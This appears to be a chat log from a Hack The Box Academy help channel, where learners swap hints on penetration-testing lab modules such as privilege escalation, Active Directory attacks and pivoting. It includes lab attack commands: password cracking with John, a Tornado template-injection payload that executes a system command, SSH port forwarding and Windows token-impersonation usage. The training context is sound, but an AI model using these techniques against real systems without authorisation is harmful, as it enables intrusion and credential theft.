#modules
1 messages · Page 271 of 1
Might be issue with how you specifying the wordlist?!
how you specifying the wordlist?
I'm using this command "john --wordlist=/usr/share/wordlists/rockyou.txt zip-hash.txt"
I can't seem to send a screenshot here idk why
try single quotes instead of double quotes
read and follow #welcome
might be something wrong with formatting of rockyou.txt!
get your roles, and send a screenshot.
maybe rockyou.txt isn't the right wordlist to use? Is this for password attacks module?
Scroll down a bit to "Connecting your accounts"
https://help.hackthebox.com/en/articles/5193100-welcome
New to the community? Start here!
Here now i'm able to send the screenshot
Idk why but when I'm cracking some ssh2john password with rockyou it works
yep, your command did not error out, just rockyou.txt did not contain the word needed to match the hash
maybe try one of the wordlists found in the module Resources
So I was trying to make a copy of the root directory like one of the modules suggested as a way to trick the system. That sorta worked? I was able to make it but not write or read. Just that it exists.
You can't write to that file
Maybe ls in that directory to see what you can do
ah , the legendary Getting Started - Privilege Escalation section
I can make new directories
That's what I've been doing.
But does that help you on this scenario?
Holy you're right! The password was not in rockyou but from the mutated password list. I actually got confused since it returns in like 1-2 sec, way too fast.
nice work
ls -la the .ssh directory in /root/ and see what seems interesting (hint; permissions) @coarse escarp
Partially because I can write in certain folders.
You don't need to write to anything
Maybe you can read a file you shouldn't
he is still user1
That too
Good catch
He still hasn't gotten to user2
Which is the important bit
The path to root is user1 --> user2 --> root
You saw what you could do with sudo -l as user1
Hot or cold?
Hey, I cannot seem to connect when I try to rdp into the target system via my kali and I cannot figure out why. Please help. I can connect to the target via psexec tho.
in order to pass the hash with RDP , a certain registry key needs to be set
Hi, yes i have already done that
Hi I am doing Initial Enumeration of the Domain section of "ACTIVE DIRECTORY ENUMERATION & ATTACKS" module. To answer the first question, it requires us to SSH into the target machine. But when I do SSH, it connects but then exits immediately. I have tried adding -o PreferredAuthentications=password but to no avail. What am I doing wrong?
it seems to work now after I updated and upgraded pkgs in my kali. thank you
which vpn server are you on?
guys, any hint about this challenge ? https://academy.hackthebox.com/module/77/section/844
the last one
done
Check root for hidden directory
||already took the key||
My advice on that wasn't for you
Use the key for root
Did you include the ----START and ----END lines
Try using a different text editor to paste into
let me check
EU-Academy-4 Recommended
thank you bro! I should've used the single quote. this really tells me that I should be serious about everything during a pentest!!!
still got the same error
||chmod 600 done too||
Make sure your system is up-to-date, that's an odd error
5 is also on low rn lol.
I tried 2, and it doesn't work either.
working fine on my end
US EAST pwnbox , US Academy 4 vpn
gonna crash now .
cheers
anyone else not able to spawn targets?
academy went down for a few seconds a moment ago
I logged out, cleared cache and everything, but the target spawning button is just loading.
yep
Anyone... Need help on intro to deserialization attacks Skills assessment 2
@open hollow
Where can I learn pwn as a beginner
https://academy.hackthebox.com/course/preview/intro-to-assembly-language
https://academy.hackthebox.com/path/preview/intro-to-binary-exploitation
https://pwn.college/
Hi guys,
I'm currently stuck on the broken auth (bypass via parameter modification) level and running out of ideas. I've tried to brute-force the user_id parameter using a list of digits. I've also tried to brute-force the token parameter in the reset password section, and I've tried some tricks with Burp Suite. However, I don't really know what else I can do or where exactly I should be brute-forcing.
If you guys have any suggestions, I would really appreciate it. Thanks!
the security information foundation path (cant remember the exact name)
If you didn't get this fixed, try adding a line break after the end of the key line; I had this issue the other day and after some googling this was the issue
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: External Recon and Enumeration Principles
Which two new IP addresses are they referring to cuz I see four?
Are the addresses 192.168.186.1 and 192.168.86.1 local addresses? So are the ones they're referring to 178.128.39.165 and 206.189.119.186?
the first 2 are name servers, the other two are resolved IPs
I'm failing to see the difference? Are the first two (192.168.186.1 and 192.168.86.1) ip addresses, not the IP addresses of ns1.inlanefreight.com and n2.inlanefreight.com?
you're resolving the ips of ns1.inlanefreight.com and n2.inlanefreight.com against 192.168.186.1 and 192.168.86.1
Please validate my understanding. So 192.168.186.1 and 192.168.86.1 are two random nameservers that nslookup used to find the A records for ns1.inlanefreight.htb and ns2.inlanefreight.htb?
So ns1.inlanefreight.htb resolves to 178.128.39.165
And ns2.inlanefreight.htb resolves to 206.189.119.186?
yes
I wouldn't say they're random nameservers, they're just ns that your host is querying
Ahh okay, so they're actually the nameservers that my host is configured to query first?
yes
Alrighty, thanks as always!
@errant rover
Hi, I hope everyone is doing good
In the exercise of **SHELLS & PAYLOADS >> Automating Payloads & Delivery with Metasploit**
there is a question
"Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. (Format: filename.extension)"
when we try to enumerate it we find
PORT STATE SERVICE VERSION
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Microsoft Windows USA daytime
17/tcp open qotd Windows qotd (English)
19/tcp open chargen
80/tcp open http Microsoft IIS httpd 10.0
for httpd there are a total of 5600+ exploits in Metasploit for HTTP; how do I choose the most suitable exploit for it?
have you considered enumerating the version of the applications that run on HTTP or other services ?
can you guide me on the filter which I should use to specify the version of HTTP?
Sorry, I meant #starting-point
oh, I don't have access to this channel
This is the sort of question that indicates some missing knowledge in key IT areas, just my opinion. If you skipped InfoSec fundamentals, it might be better to work on that first
I think you can check #welcome to get access iirc.
Hey guys so what am i missing on the Nessus skill assessment module? The instance of parrot linux does not have the nessus software on it and i am not able to install it.
the same issue goes for the openVAS module
exact thx
Accessed via browser, Use the target IP and the port number provided
geez thanks. totally missed that
Trying again: Hey y'all I need some help, I don't know if I am attacking the question wrong. I am on the Linux Fundamentals course, specifically "Filtering Contents". The first question is just stumping me and I cannot seem to find the correct answer. I have done multiple combinations of ss & netstat such as netstat | grep -Ev '127.0.0.1|::1' or ss -tuln | grep '0\.0\.0\.0' | grep -v '127\.0\.0\.1' | wc -l and I am just stumped. If someone could help me out I would appreciate it
Can someone tell me: will there be prizes for the HTB Academy streak? Or is it just for fun?
hi, ss accepts -4 for ipv4 connections
your tuln is correct, you can add 4 like -tuln4
You should grep for LISTEN and pipe to grep invert '127.0' and confirm with wc -l
Thank you for that, I appreciate it
If you want a /23 it has to start at 172.16.0.0.
got it
just omit keyword localhost and use -4 for IPV4 as well
there is one more simple way to do that.

Sure share it
I just did that today, use netstat -l.
Sure, let me find..
You will receive batches.
I used this command:
||netstat -tl4 | grep -v "localhost"||
||netstat -ln4 | grep LISTEN | grep -v 127 | wc -l||
can anybody help me out with the "Information Gathering - Web" skill assessment question "Perform active infrastructure identification against the host [https]://i.imgur.com. What server name is returned for the host?" I've tried:
- Curling the url and X-Served-By: cache-nyc-kteb1890092-NYC
- nmap -sC -sV and the best result I see is Server: Varnish
- Digging returns i.imgur.com is a CNAME that points to ipv4.imgur.map.fastly.net.
I'm just not sure what they're asking for at this point.
try checking ||the http headers||
Thank you... I was getting it with one of those commands, it just didn't seem like an answer. ¯\_(ツ)_/¯
kind of an easter egg on imgur's part I guess :^)
yes its definitely unusual
I still can't ping lab boxes and support seems to be out for the day. Can anyone help me please?
Working on the File Uploads Attacks module, Whitelist Filters. More of a Burp Intruder question than the exercise itself. This is an image from the section, with the response at the bottom "Only images are allowed." Some say 'extension not allowed'. If i know certain extensions aren't allowed up front (i.e. PHP) I can just ignore all the extensions with that same length, correct? The others I will just have to manually view the responses, and that's really the only way I can tell which extensions work and which do not?
What?
Hi. I'd like to ask about the Windows Privilege Escalation module, in the section SeImpersonate and SeAssignPrimaryToken. I wonder why there is a command flag -l 53375 next to JuicyPotato.exe, and how can I find the COM server listening port? Is this from the PID that we found from tasklist /svc?
Does it match up, then yes
-l is for the COM server listen port
https://github.com/ohpe/juicy-potato?tab=readme-ov-file#usage
i see. so what are the differences that we use the Netcat port that we usually use (8443)?
The netcat command is a connection command
The point is to make it look like a normal connection to windows
ah got it, i understand now. thanks for the answer @fathom pendant @next bronze 
F
I need some help with the File Transfers Module's Windows File Transfers section. This is for the second question. I am trying to get the win_upload.zip file from pwnbox to the target VM. I read the section multiple times and even YouTubed an explanation of the section but never looked at the answer. The thing is that I keep having trouble doing this; no matter which upload method I pick I am having trouble with these PowerShell errors.
Can someone point me in the right direction as to what I'm doing wrong? I even took notes on the section and tried specifying the exact path of the file in PowerShell.
The error says Net-Object is not a command
use New-Object
looks like the ftp requires a username and password, or at least a username
read the error, its in red
'the remote server returned an error: not logged in'
I see how to specify user and password in cmd prompt not powershell
how do I do it in PS?
open chat gpt and paste your script, then say "how do i login anonymously with this one-liner"
ok
you can even just paste the pic in
Are you hosting the ftp server? I would read over the FTP section again, the answers to your questions are in it.
Hello everyone, I am stuck in the Linux privilege escalation skills assessment module... I am only missing 2 flags but I am running out of ideas
has someone done this module recently:
Seems that there are some credentials for the tomcat adm but I can't find them... I have read that I can obtain a root shell by an exploit to the sudo version but I also can't seem to find the right exploit....
Any help will be very appreciated
have you tried visiting the tomcat page with your browser?
yes, and says I can edit a file
It also says ||where users are defined ||
which user are you trying to view it is?
as barry, seems that there are the credentials of the tomcat admin somewhere
but I have been looking for a long time and have not found them
any other files in that directory that seem interesting?
I have tried all of them and I get access denied
are you sure?
in the catalina folders are 2 files that I can see but there are no credentials
you have checked everything besides one file
the docker
Not enough red arrows 
I can't install docker since I am not root
you are barry
Take a look at Jared's modified screenshot, it highlights something you overlooked
barry, incidentally, is part of the barry group.
all the files in the directory are owned by root. But they have permissions granted to either the root group, tomcat group, and... barry
this command you just tried su barry tomcat-users.xml.bak does not make sense
su is used to switch users
I know... I've been too many hours with this
now I am in the tomcat application
!!!!!!!!!!!!!! nice!!!!
careful with the spoilers
Anyway; seems like it's resolved
spoiler tags are not adequate?
And it seems like @arctic sentinel might need to take a break
well, you are giving out the answer to the exercise

look now you got me in trouble too now
No more screenshots with red arrows for you or anyone else now. I'm gonna have to find a new hobby.
okay i'm done being off topic .
sorry....
no worries bro , it's all in good fun
Today I was facing an issue with the FTP attack: some VPN servers, mostly those located in the US, have an issue with the FTP configuration; port 2121 was closed, yet the correct answer was port 2121, so it should be open!
Common service attack module
resetting targets a few times usually gets it to spawn
Yep, I spent some time resetting and changing the VPN locations!
it's a known thing with that lab
Hi everyone!!!
I am stuck on the ATTACKING AUTHENTICATION MECHANISMS Skills Assessment module, need some help.
I've tried changing "accountType" to admin and encoding the token with my key as in Further JWT Attacks Exploiting jwk in the module, but it doesn't work, although the situation looks the same as described in the module. Need a hint
Completely stuck on the skills assessment for intro to assembly language. I've figured out a bit for the first question but I'm stuck at a wall; the second question I'm completely stuck on. Can anyone help or DM for confirmation?
#modules message
for the second question, the hint is pretty useful
@fathom pendant which inveigh release should I download? I'm in AD Enumeration & Attacks - Skills Assessment Part II and trying to "Crack this user's password hash and submit the cleartext password as your answer." https://github.com/Kevin-Robertson/Inveigh/releases
I think I downloaded Inveigh-net7.0-win-x64-nativeaot-v2.0.10.zip and used inveigh.exe but it never captured the CT***'s hash
I'm having trouble gaining escalation priv. as I'm lost to where I should look in the /bin folder.
I'm trying to get to user2
I know I'm supposed to be looking for a file that has creds for user2 but I'd like a bit of a hint.
maybe a letter or number or something.
Any tips on the first question? I've ||created a looping function and set a breakpoint at the end of the loop, then looked at the last 24 hex bytes of $rsp|| but I don't know what to do after that.
read what I've linked
where you run it also matters
I ran it on 172.16.7.60 with administrator's hash, I was on the Sq01 host
there's another host you should have admin on
I tried with ms01 but got an error
have you done the previous questions?
Sorry I didn't see the link to the previous post, clarifying question for the shellcode we combine them as is or do we have to reverse them?
just combine as is
Good afternoon everyone!
Is there a channel for Htb Machines! I have a question regarding the new seasonal machine that came online today. Thank you!
I just downloaded the precompiled one from one of the AD targets
ok

I used Inveigh-net7.0-win-x64-nativeaot-v2.0.10.zip from inveigh and it looks like it worked, I was able to get CT**'s hash
hi, I'm on the password attacks module. Stuck on the question in the Attacking AD & NTDS.dit section that asks to submit the password for John Marston
So, dump the NTDS.dit file
There's a whole set of methods
Also think of common username methodologies
I have tried generating a wordlist using cewl based on the website and used that with generated userlist from username_anarchy
I also used a list that I created manually using common username conventions
first.last flast firstlast etc.
Try using a fast wordlist for passwords
thank u
There's one shown in the section
one what?
Wordlist
ah yes. I also have one in my wordlists folder on my box
sigh
or i can try the one in the resources
Use the wordlist shown in the section for password attacking this section
thanks
I thought I had done that already; I'm probably getting confused thrashing around. Gonna try my username list with the supplied password list in the resources
it's not gonna have it
maybe the mutated list may have it, which is reused a fair bit
but look at the examples where they plug in a password list
use that
a fast one
this is where I misunderstood.... I read "shown in the section" as "provided in the resources"
if it was in the resources i would have said use mutated list
yep it's my bad
i'm on the right track now i think though thanks to your hints
i feel thick sometimes
take a minute to read and your life is better
hello everyone
Hey everyone, the Pivoting, Tunneling and Port Forwarding module: anyone have issues with SocksOverRDP, trying to copy it to the target gets flagged as a virus and it will not copy?? Anyone else had this issue and found a resolution?
I have an issue with the Skills Assessment in the module Windows Attacks & Defense
I'm not able to get any event log with the ID 4886 or 4887
of course I ran successfully the attack
disable real-time protection
are you checking on the PKI?
killa will try that now thank you
If you're still looking for this: On webadmin, forward SSH local port 3389 to 3389 on the 5.35 pivot machine; then SSH into the 5.35 machine and set up netsh interface portforward of 3389 from 5.35 to 6.25 port 3389. Now you can RDP from your attack box to the 6.25 machine.
I think I'm confused. I tried to check Event Viewer inside the DC2 machine
hey, got past that and loaded the dll but the exe says plugin wasn't loaded, pretty buggy this one
Hello, hello, someone has already done the Broken Authentication Skills Assessment, I'm a little stuck
steps simplified
- load dll
- rdp to second machine
- set the exe on second machine
- on first machine set up proxifier
- rdp from first machine to 3rd machine
ok, rdp to 2nd, is that from the 1st machine? cause the remote desktop needs the proxy to work, doesn't it?
yes
by machine number i'm referring to the initial target; #1
the middle machine mentioned in the section; #2
and the final machine mentioned by the question; #3
also you don't need the proxy for the second machine
just rdp to it from the first machine; you have direct access to it; read the text carefully for the ip and creds
use different dictionaries, don't just depend on one rockyou
English only
have you completed the PKI - ESC 1 section? I recommend going back and reviewing it carefully. Specifically, what it says regarding Events 4886 and 4887
well you need to go from 1 --> 2 and set up the relevant tools
then once everything is set up you should be able to go 1 --> 3
ah , are you discussing the SocksOverRDP section?
can i close 2 once setup to reduce network stress
yes I did it without difficulty. I cannot connect to PKI with RDP
thats intended
I guess I cannot check the log through Event Viewer but directly with the command line
yep :)
Get-WinEvent 
Can you recall how you were able to connect to PKI before? In the PKI - ESC1 section?
read the section, it tells you how to adjust for that situation
but i believe so; as closing rdp doesn't log out of the session, technically. as you can re-rdp in and pick back up
Hey, on academy I'm trying to start a module, by clicking unlock, but nothing happens. Does anyone know why this might be?
For extra context, I have recently unlocked a different module and I have enough points to unlock it
I cannot connect through winRM to the PKI machine
maybe test it on a different browser
why not? Is it giving you any errors?
odd why did it work on safari but not brave
ty anyway
probably
brave has native popup/adblockers that you'd have to do some whitelisting to get HTB to work right
Hello
Any hints for Whitebox pentesting type juggling?
I am literally banging my head against the wall
Whitebox Attacks - Authentication Bypass?
Yes
Which one?
anyone here able to help get information on a pred?
This isn't the server for that read #rules and reach out to police
okay thank you, he's said some vile stuff so tryna get information on him before I called the police.
I cannot perform the port forwarding because when I executed the next command: ssh -L 1234:localhost:3306 ubuntu@10.129.224.78
Then I execute: netstat -natp | grep 1234
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
ubuntu@WEB01:~$
I don't know why the port forwarding doesn't work properly
What am I doing wrong?
Anyone here good with Linux?
I need to ask some questions for an application I am making
It is not local host. It is the target Server's IP
Not working yet
if you suspect illegal activity call them (police). This server isn't a hacker for hire/rent server
The server on the other side of the tunnel.
Not the pivot box
Any hints?
Let]
Let's try
The target has the port 3306 open locally so I want to access this port using my attacker machine by using portforwarding over SSH
So I cannot do it
I cannot see it externally so the only way is using port forwarding
I want to use the SSH way
are you doing the port-forwarding/pivoting module/have you done that module
I'm trying to transfer a file using the "Bash" method, but nothing is happening. I'm not seeing any files after entering these commands.
Any insight?
Yes I'm doing this but I cannot yet
Show a screenshot bro!
what section are you on?
i don't see where 3306 is open, I see where 3389 would be open
since it's stating RDP
also it's much easier to just do ssh -D instead
Well, actually, I'm getting a connection refused error.
because you're misunderstanding what you're meant to do
also yeah; that IP won't work because it's just an example
adapt to your situation
I'm all ears.
And that's my actual tun0 ip
connection refused it could be that you need to use sudo
considering port 80 is < 1024
any port < 1024 requires sudo to open
Sudo didn't work...
also; first statement "Connect to target webserver"
meaning you have to connect to the target/victim that's listening
I'm currently ssh'd into the target.
I was able to use a python server and transfer the files, no prop.
if not; adapt to whatever port your webserver is running on
:))
connection refused == port not open or firewall prevented
No?
I'm confused.
Ok, so still start the python server on my host?
yes
if you notice: the example is stating using a web server
and port 80 is default http
but if you're not default; you'll need to adapt
imo this scenario is something you'll rarely ever encounter
See it ends with 50 not 78
that's actually not applicable in this scenario
that's just a visual aid
So, where is my file?
Got it.
Not sure why this confused me.
in this scenario for the question, I don't believe SQL is actually running, and this is just an example to help clarify
You didn't open a server. It says connection refused
we're past that
look further down the screenshot
:)
I got it goin.
also i suggest taking actual screenshots instead of half-quality phone camera shots
makes it much easier to actually read (as long as you're not grabbing a 4k screen)
you're using a vm yeah?
Lol
depending on your vm there's a host escape key and windows has the win+shift+s which is the screen snip tool
Well, I use discord on my iPad, and I'm working on my laptop.
I didn't want to do a bunch of extra stuff.
well; it'll lead to better quality and easier parsing for others
I'll figure out a better workflow.
or at the very least, learn how to aim at your laptop straight
instead of at a weird angle
What is the output of your server?
Thank you Marcie...
I solved it. I am confused still lol.
Not sure what you mean.
they figured it out
it was a simple issue between keyboard and chair

Question
So, in the modules, we only have access to the target because we were given a vpn key.
How are they gaining access in a real attack?
usually via explicit permission from the company
Hey guys I understood the concept thank you so much for you amazing support !!
either through an external web server; or through a direct connection
it just depends on the scope and the contract ¯\_(ツ)_/¯
some want a full out to in; some only want to see what the damage could look like if it was just some internal threat actor
the CPTS exam is from the perspective of full Outside to In
Right. I guess I'm thinking of full outside to in.
No access given at all.
Break through DMZ (The device that would share an Interface with the VPN) to internal (Devices that share an internal network interface with the device)
usually via an exposed web-server
Ok... I see.
Web servers are by far the most common vector for threat actors to break in
it's why a portion of the course goes over surface level web vulns ¯\_(ツ)_/¯
Makes sense.
Still putting the whole big picture together in my head.
Hi
don't try putting the picture together without all the pieces
just know that pivoting is a small piece of the puzzle
hence why it's important to learn
otherwise you'd be going from box to box from an internal host, and constantly transferring binaries/files
leaving a huge trace/mess to clean
What? :"D
I mean, just the general concept and where common attack surfaces are.
it's simple; how do most businesses reach customers -- via the web
a lot of the common services that get attacked are also backend services for web services
Right.
It's basically attacking a web app and getting a shell, then pivoting and escalating.
yep
though in most cases you'd drop some form of persistence rather than a simple reverse shell; (but that goes beyond the scope of CPTS)
Thanks for teaching us marcie
I just read a lot
But it really just depends
that's the whole crux of it;
you're not normally gonna find an exposed server that has EVERY service on it
But what about attacking someone's personal computer?
There is no web server or app.
that's via social engineering
Right...
often a malicious file download that links their computer to your C2 server
I see.
because having them directly connect to your machine is a one way ticket to getting caught fairly quickly
but again attacking individuals is NOT part of HTB curriculum at all
and I doubt it will be
considering the legal implications that could come of it
They don't cover social engineering?
no
pegasus malware
Social engineering isn't really something that is easily taught
you need an actual test dummy to throw your attempts at
Oh ok.
I feel like that's in the OSCP
it's not
Hm
the OSCP and CPTS cover similar domains
and Social Engineering dives more into Red Team than it does Penetration Testing
(it's not mutually exclusive, but you'll see Social Engineering attempts more in a Red Team operation)
They've got a client side attack module there; there is a script simulating a user clicking an email attachment
there's some phishing
but it's not to the extent where they teach you how to set up a tool like GoPhish or other popular phishing tool
I thought pen testing was emulating red team attacks. Basically.
nope
completely different scopes
Hm
Red Team are still on the side of security btw
Red/Blue team are two sides of the same coin
Red Teams are meant to emulate a more sophisticated threat actor
From my understanding pentest focus is picking out vulns and usually there's a strict scope, while red team literally behave like real world threats and test the ability of your blue team and entire defense system?
AV Evasion, C2 servers, etc.
Right.
But blue is more soc analysts.
basically PenTesting isn't a matter of getting caught -- it's a matter of finding weaknesses and often it doesn't matter
Red Teaming however takes it to another level; you don't want to get caught, period
Yeah like simulating APTs
I hear you.
to summarize someone that actually does red teaming: "pen-tests are meant to be comprehensive assessments and red team assessments are meant to represent a realistic threat actor"
but you could have a pen-test where they want you to be as quiet as possible, and red team engagements where they want you to make as much noise as possible
They would seem similar, but have some differences in scope.
Hey got it marcielee, thanks for that. yeah the internet was a nightmare; when it was done right it just kept disconnecting, even with the modem 56k
setting
switch to the tcp vpn
I'm creating notes for the different kind of "remote password attacks" that are possible, and I have trouble finding a specific term. Currently I have:
- **Brute Force = user list + pass list**
- **Password Spraying = user list + 1 pass**
- **? = 1 user + pass list**
- **Credential Stuffing = list of user:pass combinations**
So how do you call trying to find the password for a specific user with a list of passwords?
like hydra -l username -P pass.list or kerbrute bruteuser
there's no specific term that I know of. I would just call it "Bruteforcing a user's password."
I'm sure CompTIA is a bit more pedantic
actually, "bruteforcing" itself is somewhat of a colloquialism. A literal bruteforce is to test every single possible character combination until the right one is found. But in everyday vernacular, bruteforcing is just the overarching term for the types of attacks you are describing.
Well, I am stuck at the skills assessment for Whitebox PenetrationTesting. I got Larry. Any advice? Or am I following a rabbit hole?
@west canopy Alright, thanks for the answer. After searching on the internet and then asking 2 LLMs and getting different answers every time, that's also what I was going for, but I wondered if there was a specific, not widely used word for it.
np, just as an example from our Password Attacks module
we just say "bruteforce the password of the user sam"
There's one instance of using a password spray; but that's in the AD enum and attacks module, in context you already have a foothold user and are doing further enumeration
Good morning / Good afternoon to all. I hope you are having an excellent Sunday. I have a question regarding the SSRF template injection example 2. During the exercise the author indicates to inject a Tornado payload to get the whoami on the system as such:
curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam
When I perform the same I get the same result as in the example but I don't see where the whoami info is.
<h3 style="text-align: center;"><em>Email 0 has been subscribed. You'll hear from us soon!</em></h3> --> This should be here but it is not very clear what the current account is.
The same thing happens when I try to get the ls content of the directory or cat something. No clear result. Any input is welcome. Thank you loads
is it You'?
I have the same problem. Has anyone completed the 2nd question on KLEE in the binary fuzzing module? KLEE produces only one error " memory error: null page access" for me. But there should be two errors...
It's very strange because in the exercise I don't see where the whoami comes up. In that picture no whoami account is visible, I think.
try injecting another command and see how it differs
yes .... I did this with multiple commands and also checked if the exercise server is ON. I was getting the same answer in burp for all commands. The same when injecting commands with curl
have you tried using single quotes instead of double quotes?
good thought, but I am getting a 500 internal error
ok then I'm not sure :/ I haven't done this module so idk
no stress, thank you for your input cydroz
can I DM someone about AEN?
For Intro To Assembly Skill Assessment I believe that I have optimized the code correctly but I'm still not getting the flag. Can anybody double check to see if I'm missing something?
check if the shellcode is under the limit, if it isn't, optimise some more
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Initial Enumeration of the Domain
When they list the types of setups a client may choose for testing, this is one of them:
VPN access into their internal network (a bit limiting because we will not be able to perform certain attacks such as LLMNR/NBT-NS Poisoning).
Can someone explain to me why we wouldn't be able to perform LLMNR/NBT-NS Poisoning?
Can't responder be started and the attack carried out from a machine that we compromise?
Yes but after having a foothold, and it's especially interesting to get a foothold (my understanding)
I don't think I have the skill or vision to optimize it more than I already have, going from the hint I removed the last part but from what I'm seeing the final byte size is still too high, if we're supposed to make it an elf64 executable afterwards.
Wdym by "it's especially interesting to get a foothold"?
use the hint and the Shellcoding Techniques section
It's a great attack vector to get a first domain user, to "set a foot" in the AD*
just use the hint
you just send the shellcode btw, you don't have to compile
or rather just extract the shellcode because the compiled binary will be a lot bigger
The IPs you get through a VPN are usually in another subnet and the traffic will route through the VPN gateway to reach the internal network, so there wouldn't be any LLMNR/NBT-NS to poison. Once you have compromised a host, of course, then you can run your poisoners there locally.
Understood, thanks.
Just so I'm understanding this right. When you connect via a VPN, you'll get access to a separate subnet, this subnet will then communicate with resources on the internal network through a "VPN gateway" that separates the VPN subnet from the internal network. So like this:
Me at home → (Over VPN) → VPN subnet (at company) → VPN gateway → Internal resources
And since there are no resources on the VPN subnet, I can't perform LLMNR/NBT-NS poisoning? Isn't it possible for other people (targets) to be connected to the VPN subnet on whom I can perform the attack when they try to access an internal resource?
that is generally the case but it depends heavily on their configuration, but yes, usually it's isolated
Also, am I understanding the following statement correctly? I've drawn a diagram based on it.
A custom pentest VM within their internal network that calls back to our jump host, and we can SSH into it to perform testing.
there usually isn't much traffic inside the vpn subnets and again depends on how it's configured, you might not even be able to reach the other vpn hosts
Understood, so it all depends on the configuration. Thanks!
something like that, usually it's you connect to the vpn provided, then rdp/ssh into their internal host for your pentests
Got it, thanks.
@limber river @next bronze I can proudly tell you I'm an idiot that thinks too much and made this much harder than needed. With that being said, I figured it out. Thank you.
hey guys!!
Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.
How should I connect?
I used python3 mssqlclient.py backdoor:Password1@<ip>, but still can't connect to it
what should I do need help
What authentication does it use? Does it tell you?
no
whats the error
i used msfconsole
and it says login failed unable to connect
what's the error from mssqlclient? and what's the module and section
I cannot get anything
select name from sys.database is not running
This might be related #modules message
can someone help me with the file upload attacks type filter?
hey, I know I already saw this background on an app but don't remember the name, it can make topology and other stuff
thanks
Hi all, I am on the Kerbal Exploit module. Copied the Registry Hives, also priv. esc. to Admin. Upon opening the PS shell as admin and accessing the directory C:\Windows\temp, none of the copied hives are there. I have also manually copied them, still nothing shows, any ideas? Thanks in advance!
Is there a way to make the yellow banner at the top of the page for all modules go away?
I tried using ublock origin but it just broke the page more
I'm in the AD enum and attacks module right now and I had a thought about Nmap I wanted to check with y'all.
Is there a difference between the two scans below?
# Scan 1
sudo nmap -sV -sC -Pn -n -iL hosts.list
# Scan 2
sudo nmap -sV -sC -A -Pn -n -iL hosts.list
I know that -A performs some more stuff like OS detection and whatnot, but I've had instances where performing scan 2 will leave out information I found in scan 1. Any of y'all face similar issues?
Just to be clear, I did not face this issue in the module I'm currently doing.
Y'all can ignore the -iL hosts.list since when I faced this issue, it was against a single IP address/host.
more flags just check more things, you shouldn't get less information in return
I think it happened to me on one of the machines on the main platform, Crafty iirc. But good to know that information shouldn't be less. So it's always better to have -A in there?
can someone help with this
depends on how you want to scan it, -A checks more things but your scans will also take longer
just ask bud
on the tomcat host in the internal network (MS01), is the login supposed to be bruteforcable? Because my attempts seem to keep timing out
timing out or failed to find the right creds
it times out before it reaches the last set of creds
it shouldn't timeout, you need a stable connection to interact with other hosts too
Can someone help me in this question from DNS Enumeration using Python
Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.
I have seen all the records using dig and nslookup but no record stands out except SPF.
Update: Solved
Does it perform active vulnerability checks?
It doesn't, right? At least I didn't see anything in the documentation about it doing so.
Linux privilege escalation - Environment enumeration, trying to submit the flag but says its wrong, can anyone help out?
You sure there is no trailing space?
yup made sure to copy the flag only, no spaces
did you get the right flag
In this module, there's the following command, but when I run it, it doesn't write the usernames it found to the file. It just outputs in the terminal and the file is empty. What's wrong with the command?
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
Hi
yeah... it's dumb
submit to #1234357888114364508
Anyone know the format of the question "Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?" (Module: Linux Privilege Escalation)? Is it the full path? I'm having a very hard time here
Should I just redirect output?
command > file.txt
it likely won't have the desired output
yeah theres only 1
as > redirects all the stdout, where the output command could do something additional
Yeah, it won't. And what's surprising is that the help page for kerbrute shows that the correct option is used. So do I still need to submit to #1234357888114364508?
yes
Ok
as the tool isn't working as intended
What do y'all CPTS people do in this case?
use a different tool
kerbrute is just an old and buggy tool tbh
but there's not really a replacement for it
can't you do it with nxc/cme?
Oh, what's recommended in its stead?
Welp 
doesn't do kerberos, it's much faster
it be like that
Y'all do some kind of grep on the output to get the usernames then?
I use tmux so it's easier for me to manage outputs and search through them afterwards, idk what other people would do tho
what's the first and last letter inside {}
Search through them? I'm using kerbrute to enum users so I wanna get a list. I use tmux too, but I don't think there's a way to extract the usernames using it, right? I'll have to do some sort of text redirection and formatting, yeah?
S...d
Also, what do y'all do for the CPTS exam and pentests then? How do y'all report the output? Copy-paste?
yeah not the right flag
copy mode and just copy 
I have a script that will copy the output from the last command
but yeah redirection should work in this case
That's neat.
I like to copy and paste into code blocks, personally I feel they're better, but some of my colleagues use screenshots, doesn't really matter
What's the recommended method for CPTS reporting?
Or just in general?
Also, what tool do you use for reporting that lets you copy-paste to code blocks?
there's templates publicly available if you check #cpts
there's also the Documentation and Reporting module
Noted. Thanks Marice.
Haven't reached there yet but good to know it's covered.
I did read a bit of it briefly once a long time back.
Documentation and Reporting pulls together practically everything you did up until that point in the path
then Attacking Enterprise Networks is the Mock Exam
doing that blind (don't read the questions or text) is a good sign you'll be in the right mindset for the exam
Does documentation and reporting contain another pentest to walkthrough and document?
Do it blind the first time or second time?
first
it's not blind if you already saw it once
True 
I'll have to organize my mess of notes before that module then.
it has a report for that module that's referenced
That module?
Documentation and Reporting, yes
Oh, okay, got it.
AEN itself is the walkthrough for itself
that's why it's recommended to do it blind
there's a neat trick where copying stuff from vscode into msword will retain the font, highlighting and even the theme, so I just do that
notes on the engagement are in Obsidian, then the final report is in MS Word, so just transfer them around
The Object > Open Document trick?
I see. I was thinking of doing the same.
no just directly copy from vscode to msword, you can give it a try
What in the world kinda format is this? I was trying to grep '@inlane' the output of kerberos.
Oh ok.
If you don't mind answering, what's your personal folder structure preference when notetaking on an assessment? Do you create a folder for each host?
@fathom pendant what should I tag the #1234357888114364508 as?
target error
nah there can be hundreds of hosts, I group them by findings, similar to the report template actually
By findings? How do you mean?
special characters used to add highlighting to your terminal, you can use ansifilter to remove them
check the report template
findings/vulnerabilities
I don't see that section?
technical findings details
Technical Findings
Ohh, okay.
Attacking web applications with ffuf
Value Fuzzing
seems that everything is accepted, however when i try to use that as one of the ID it claims the ID is invalid
sounds like you need to filter a size
yes but when i filtered for 768
the ID wasn't correct
holdon actually
also delete this since it's spoiler
whaaat
